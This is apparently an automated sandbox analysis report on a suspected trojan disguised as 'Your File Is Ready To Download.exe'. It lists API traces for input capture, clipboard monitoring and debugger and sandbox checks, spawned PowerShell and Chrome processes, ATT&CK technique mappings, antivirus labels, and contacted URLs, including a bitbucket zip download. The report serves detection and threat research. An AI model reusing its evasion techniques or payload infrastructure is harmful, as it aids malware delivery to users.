Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400226B7 GetKeyboardLayout followed by cmp: cmp eax, 5dh and CTI: ja 00000001400228E9h country: Inuktitut (iu)	1_2_00000001400226B7
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400226BF GetKeyboardLayout followed by cmp: cmp ax, 0020h and CTI: je 00000001400228E9h country: Urdu (ur)	1_2_00000001400226BF
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400226BF GetKeyboardLayout followed by cmp: cmp eax, 5dh and CTI: ja 00000001400228E9h country: Inuktitut (iu)	1_2_00000001400226BF
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400226C6 GetKeyboardLayout followed by cmp: cmp ax, 0020h and CTI: je 00000001400228E9h country: Urdu (ur)	1_2_00000001400226C6
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400226C6 GetKeyboardLayout followed by cmp: cmp eax, 5dh and CTI: ja 00000001400228E9h country: Inuktitut (iu)	1_2_00000001400226C6
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400226ED GetKeyboardLayout followed by cmp: cmp ax, 0020h and CTI: je 00000001400228E9h country: Urdu (ur)	1_2_00000001400226ED
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400226ED GetKeyboardLayout followed by cmp: cmp eax, 5dh and CTI: ja 00000001400228E9h country: Inuktitut (iu)	1_2_00000001400226ED
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140022711 GetKeyboardLayout followed by cmp: cmp ax, 0020h and CTI: je 00000001400228E9h country: Urdu (ur)	1_2_0000000140022711
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140022711 GetKeyboardLayout followed by cmp: cmp eax, 5dh and CTI: ja 00000001400228E9h country: Inuktitut (iu)	1_2_0000000140022711
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140022735 GetKeyboardLayout followed by cmp: cmp ax, 0020h and CTI: je 00000001400228E9h country: Urdu (ur)	1_2_0000000140022735
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140022735 GetKeyboardLayout followed by cmp: cmp eax, 5dh and CTI: ja 00000001400228E9h country: Inuktitut (iu)	1_2_0000000140022735

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3930			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5126			Jump to behavior

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe

Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000409

Jump to behavior

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe

API coverage: 4.5 %

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe

Code function: 1_2_0000000140018A20

1_2_0000000140018A20

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400ACC40 FindFirstFileW,FindClose,FindFirstFileW,FindClose,	1_2_00000001400ACC40
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014003C320 FindFirstFileW,FindNextFileW,FindClose,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,	1_2_000000014003C320
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400667A0 FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,	1_2_00000001400667A0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140080A40 GetFullPathNameW,GetFullPathNameW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,GetLastError,wcsncpy,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,MoveFileW,DeleteFileW,MoveFileW,GetLastError,CopyFileW,GetLastError,	1_2_0000000140080A40
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140066AE0 FindFirstFileW,GetLastError,FindClose,FileTimeToLocalFileTime,FileTimeToSystemTime,malloc,	1_2_0000000140066AE0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400ACB40 GetFileAttributesW,FindFirstFileW,FindClose,	1_2_00000001400ACB40
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140081030 GetFileAttributesW,FindFirstFileW,FindClose,	1_2_0000000140081030
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140067130 CreateFileW,GetFileSizeEx,CloseHandle,FindFirstFileW,GetLastError,FindClose,	1_2_0000000140067130

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: Your File Is Ready To Download.exe, 00000001.00000002.369346685.000000000015A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW6%
Source: Your File Is Ready To Download.exe, 00000001.00000002.369346685.000000000015A000.00000004.00000001.sdmp, Your File Is Ready To Download.exe, 00000001.00000002.369250966.00000000000F3000.00000004.00000001.sdmp, Your File Is Ready To Download.exe, 00000001.00000003.368850888.00000000000F3000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe

Code function: 1_2_00000001400D0790 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

1_2_00000001400D0790

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe

Code function: 1_2_000000014009E010 SendMessageW,SendMessageW,SendMessageW,LoadLibraryW,GetProcAddress,SendMessageW,SendMessageW,SendMessageW,

1_2_000000014009E010

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe

Code function: 1_2_00000001400D6D5C GetProcessHeap,HeapAlloc,_errno,_errno,__doserrno,_errno,GetProcessHeap,HeapFree,SetEndOfFile,_errno,__doserrno,GetLastError,

1_2_00000001400D6D5C

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe

Code function: 1_2_0000000140014BA0 CloseHandle,CreateMutexW,GetLastError,CloseHandle,GetWindowThreadProcessId,AttachThreadInput,GetTickCount,GetCurrentThreadId,GetAsyncKeyState,GetAsyncKeyState,GetForegroundWindow,GetWindowThreadProcessId,GetGUIThreadInfo,GetWindowThreadProcessId,GetKeyboardLayout,GetProcAddress,FreeLibrary,GetTickCount,BlockInput,GetTickCount,PeekMessageW,GetTickCount,PostMessageW,GetTickCount,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetForegroundWindow,GetWindowThreadProcessId,AttachThreadInput,BlockInput,GetTickCount,GetForegroundWindow,GetWindowThreadProcessId,

1_2_0000000140014BA0

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400D2224 SetUnhandledExceptionFilter,		1_2_00000001400D2224
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400D0790 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		1_2_00000001400D0790

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe

Code function: 1_2_0000000140016D90 GetCurrentThreadId,GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,BlockInput,GetForegroundWindow,GetAsyncKeyState,keybd_event,GetAsyncKeyState,keybd_event,GetAsyncKeyState,BlockInput,

1_2_0000000140016D90

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe

1_2_00000001400415D0

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized

Jump to behavior

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe

Code function: 1_2_00000001400185A0 mouse_event,

1_2_00000001400185A0

Source: Your File Is Ready To Download.exe, 00000001.00000002.369525393.00000000007F1000.00000004.00000001.sdmp	Binary or memory string: ProgmanidgetWin_1Ye
Source: Your File Is Ready To Download.exe	Binary or memory string: Program Manager
Source: Your File Is Ready To Download.exe	Binary or memory string: Shell_TrayWnd
Source: Your File Is Ready To Download.exe	Binary or memory string: Progman
Source: Your File Is Ready To Download.exe	Binary or memory string: "%-1.300s"The maximum number of MsgBoxes has been reached.IsHungAppWindowDwmGetWindowAttributedwmapi.dllahk_idpidgroup%s%uProgram ManagerProgmanWorkerWError text not found (please report)Q\E{0,DEFINEUTF16)UCP)NO_START_OPT)CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument is compiled in 8 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe

Code function: 1_2_000000014001FD1E SetCurrentDirectoryW,malloc,GetSystemTimeAsFileTime,

1_2_000000014001FD1E

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe

Code function: 1_2_00000001400CD9B4 HeapCreate,GetVersion,HeapSetInformation,

1_2_00000001400CD9B4

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe

Code function: 1_2_0000000140068C10 GetComputerNameW,GetUserNameW,

1_2_0000000140068C10

Source: Your File Is Ready To Download.exe	Binary or memory string: WIN_XP
Source: Your File Is Ready To Download.exe	Binary or memory string: ?A Goto/Gosub must not jump into a block that doesn't enclose it.ddddddd%02d%dmsSlowLogoffSingle1.1.33.06\AutoHotkey.exeWIN32_NTWIN_8.1WIN_8WIN_7WIN_VISTAWIN_XPWIN_2003%04hX0x%IxpPIntStrPtrShortInt64DoubleAStrWStrgdi32comctl32kernel32W-3-4CDecl-2This DllCall requires a prior VarSetCapacity.Pos%sLen%sPos%dLen%dLenMarkpcre_calloutCompile error %d at offset %d: %hs-+0 #diouxXeEfgGaAcCpULlTt%0.*fFfSelectVisCenterUniDescLogicalNoSortAutoHdrFirstBoldExpandGDI+JoyJoyXJoyYJoyZJoyRJoyUJoyVJoyPOVJoyNameJoyButtonsJoyAxesJoyInfo
Source: Your File Is Ready To Download.exe	Binary or memory string: WIN_VISTA
Source: Your File Is Ready To Download.exe	Binary or memory string: WIN_7
Source: Your File Is Ready To Download.exe	Binary or memory string: WIN_8
Source: Your File Is Ready To Download.exe	Binary or memory string: WIN_8.1

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014001E310 PostThreadMessageW,Sleep,GetTickCount,GetExitCodeThread,GetTickCount,Sleep,CloseHandle,CreateMutexW,CloseHandle,CreateMutexW,CloseHandle,Shell_NotifyIconW,IsWindow,DestroyWindow,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DestroyIcon,IsWindow,DestroyWindow,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DestroyIcon,DestroyIcon,IsWindow,DestroyWindow,DeleteObject,RemoveClipboardFormatListener,ChangeClipboardChain,mciSendStringW,mciSendStringW,DeleteCriticalSection,OleUninitialize,	1_2_000000014001E310
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140072DC0 RemoveClipboardFormatListener,ChangeClipboardChain,	1_2_0000000140072DC0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014001EFA0 AddClipboardFormatListener,PostMessageW,SetClipboardViewer,RemoveClipboardFormatListener,ChangeClipboardChain,	1_2_000000014001EFA0

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Path Interception	Exploitation for Privilege Escalation1	Disable or Modify Tools1	Input Capture21	System Time Discovery11	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Command and Scripting Interpreter2	Boot or Logon Initialization Scripts	Access Token Manipulation1	Deobfuscate/Decode Files or Information1	LSASS Memory	Account Discovery1	Remote Desktop Protocol	Screen Capture1	Exfiltration Over Bluetooth	Encrypted Channel11	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Process Injection12	Obfuscated Files or Information1	Security Account Manager	File and Directory Discovery2	SMB/Windows Admin Shares	Input Capture21	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Software Packing1	NTDS	System Information Discovery34	Distributed Component Object Model	Clipboard Data2	Scheduled Transfer	Application Layer Protocol4	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	File Deletion1	LSA Secrets	Security Software Discovery131	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Masquerading3	Cached Domain Credentials	Process Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion21	DCSync	Virtualization/Sandbox Evasion21	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Access Token Manipulation1	Proc Filesystem	Application Window Discovery11	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Process Injection12	/etc/passwd and /etc/shadow	System Owner/User Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	Remote System Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Your File Is Ready To Download.exe	19%	Virustotal		Browse
Your File Is Ready To Download.exe	9%	Metadefender		Browse
Your File Is Ready To Download.exe	11%	ReversingLabs	Win64.Trojan.Generic
Your File Is Ready To Download.exe	100%	Avira	TR/Agent.pwc

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\7040_2142074851\_platform_specific\x86_64\pnacl_public_x86_64_ld_nexe	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\7040_2142074851\_platform_specific\x86_64\pnacl_public_x86_64_ld_nexe	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
1.0.Your File Is Ready To Download.exe.140000000.0.unpack	100%	Avira	TR/Agent.pwc		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://betasupreme.com/uninstalled/	0%	Avira URL Cloud	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://betasupreme.com/thankyou/	0%	Virustotal		Browse
https://betasupreme.com/thankyou/	0%	Avira URL Cloud	safe
https://autohotkey.comCould	0%	URL Reputation	safe
https://dns.google	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://betasupreme.com/i/?checksafe=	0%	Avira URL Cloud	safe
https://go.micro	0%	URL Reputation	safe
https://www.google.com;	0%	Avira URL Cloud	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://betasupreme.com/i/?nx=	0%	Avira URL Cloud	safe
https://betasupreme.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
s3-w.us-east-1.amazonaws.com	52.217.81.204	true	false	high
bitbucket.org	104.192.141.1	true	false	high
accounts.google.com	142.250.185.109	true	false	high
www.google.com	142.250.181.228	true	false	high
clients.l.google.com	142.250.186.78	true	false	high
googlehosted.l.googleusercontent.com	142.250.186.65	true	false	high
clients2.googleusercontent.com	unknown	unknown	false	high
bbuseruploads.s3.amazonaws.com	unknown	unknown	false	high
clients2.google.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://bitbucket.org/betadevmode/devmode/downloads/block-floc.zip	false	high
https://clients2.googleusercontent.com/crx/blobs/Acy1k0bLIjHsvnKaKN_oRpVaYYvFs25d7GKYF1WXrT6yizCMksBO0c_ggE0B6tx6HPRHe6q1GOEe3_NcIbSiGG8kXeLMUY0sAKVvC6R89zvKM13s5VqoAMZSmuUgjQL5vlygJuArQghXXE_qTL7NlQ/extension_8520_615_0_5.crx	false	high
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0	false	high
https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=85.0.4183.121&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1	false	high
https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard	false	high
https://www.google.com/async/newtab_promos	false	high
https://www.google.com/async/ddljson?async=ntp:1	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://apis.google.com/js/client.js	mirroring_common.js.11.dr	false		high
https://autohotkey.com	Your File Is Ready To Download.exe	false		high
https://play.google.com	c0ca93c8-b969-4ca1-a409-af5f66935290.tmp.12.dr, d79ff584-f405-453e-ba88-df68519d04c2.tmp.12.dr	false		high
https://betasupreme.com/uninstalled/	powershell.exe, 00000008.00000002.319612768.000002691E865000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.319462059.000002691E732000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.319598583.000002691E851000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000008.00000002.329343916.000002692DE46000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://crash.corp.google.com/samples?reportid=&q=	common.js.11.dr, mirroring_cast_streaming.js.11.dr	false		high
https://www.google.com/log?format=json&hasfast=true	mirroring_hangouts.js.11.dr	false		high
http://www.ietf.org/id/draft-holmer-rmcat-transport-wide-cc-extensions-01	mirroring_hangouts.js.11.dr	false		high
https://preprod-hangouts-googleapis.sandbox.google.com	mirroring_hangouts.js.11.dr	false		high
https://www.google.com	manifest.json.11.dr, c0ca93c8-b969-4ca1-a409-af5f66935290.tmp.12.dr, d79ff584-f405-453e-ba88-df68519d04c2.tmp.12.dr	false		high
https://hangouts.clients6.google.com	mirroring_hangouts.js.11.dr	false		high
https://meet.google.com	mirroring_common.js.11.dr	false		high
https://hangouts.google.com/hangouts/_/logpref	mirroring_hangouts.js.11.dr	false		high
https://accounts.google.com	manifest.json.11.dr, c0ca93c8-b969-4ca1-a409-af5f66935290.tmp.12.dr, d79ff584-f405-453e-ba88-df68519d04c2.tmp.12.dr	false		high
https://clients2.google.com/cr/report	mirroring_hangouts.js.11.dr, mirroring_cast_streaming.js.11.dr	false		high
https://contoso.com/	powershell.exe, 00000008.00000002.329343916.000002692DE46000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000008.00000002.329343916.000002692DE46000.00000004.00000001.sdmp	false		high
https://creativecommons.org/publicdomain/zero/1.0/.	mirroring_hangouts.js.11.dr	false		high
https://apis.google.com	manifest.json.11.dr, c0ca93c8-b969-4ca1-a409-af5f66935290.tmp.12.dr, d79ff584-f405-453e-ba88-df68519d04c2.tmp.12.dr	false		high
https://bitbucket.org/betadevmode/devmode/downloads/block-floc.zipBs	Your File Is Ready To Download.exe, 00000001.00000002.369250966.00000000000F3000.00000004.00000001.sdmp, Your File Is Ready To Download.exe, 00000001.00000003.368850888.00000000000F3000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000008.00000002.317826184.000002691DDE1000.00000004.00000001.sdmp	false		high
https://betasupreme.com/thankyou/	powershell.exe, 00000008.00000002.319612768.000002691E865000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.319462059.000002691E732000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.319598583.000002691E851000.00000004.00000001.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/madler/zlib/blob/master/zlib.h	mirroring_hangouts.js.11.dr	false		high
